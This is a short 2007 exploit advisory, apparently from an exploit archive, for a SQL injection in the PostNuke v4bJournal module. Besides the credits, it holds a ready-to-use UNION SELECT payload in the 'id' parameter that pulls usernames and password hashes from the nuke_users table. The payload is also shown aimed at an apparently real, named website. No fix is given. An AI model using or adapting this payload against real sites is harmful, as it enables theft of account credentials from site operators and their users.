PostNuke Module v4bJournal Remote SQL Injection Vulnerability

2007-05-02 00:00:00

----------------------------------------
PostNuke Journal
----------------------------------------

DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran

Greetz For All Y! UnderGround Group Members ( www.2600.ir )

Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

Contact: [email protected]


{SQL BUG}



in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)




------------------------------------------

EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact: [email protected]



index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*


U must regrister first ( You Most Register First )
-------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.